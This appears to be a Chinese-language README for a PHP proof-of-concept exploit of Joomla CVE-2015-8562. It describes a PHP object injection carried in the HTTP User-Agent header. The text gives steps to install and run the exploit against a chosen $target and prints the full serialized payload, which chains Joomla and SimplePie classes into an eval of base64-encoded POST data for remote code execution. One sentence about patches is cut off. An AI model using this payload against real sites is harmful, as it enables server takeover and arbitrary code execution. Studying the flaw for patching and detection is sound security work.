
针对Joomla的CVE-2015-8562漏洞的概念验证
Joomla CVE-2015-8562 漏洞的概念验证(PoC)
此 PoC 几乎完全复制了 Gary 的 Python 实现,该实现托管在 exploit-db 上。
安装过程非常简单:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Composer 安装完所有依赖后,你需要修改 exploit.php 中的 $target 变量。
之后就可以使用了:
php exploit.php
2015年12月,Joomla 中发现了一个漏洞。它允许远程攻击者通过 HTTP User-Agent 头部执行 PHP 对象注入攻击,并执行任意 PHP 代码。
此漏洞影响 Joomla 的所有版本。针对 v1.5.x、v2.5x 和 v3.x 的补丁已。
如果你运行的是 PHP >= 5.4.45、>= 5.5.29 或 >= 5.6.13,则不受影响,因为该漏洞利用也依赖于 CVE-2015-6835。
以下是发送的 User-Agent 头部的样子:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}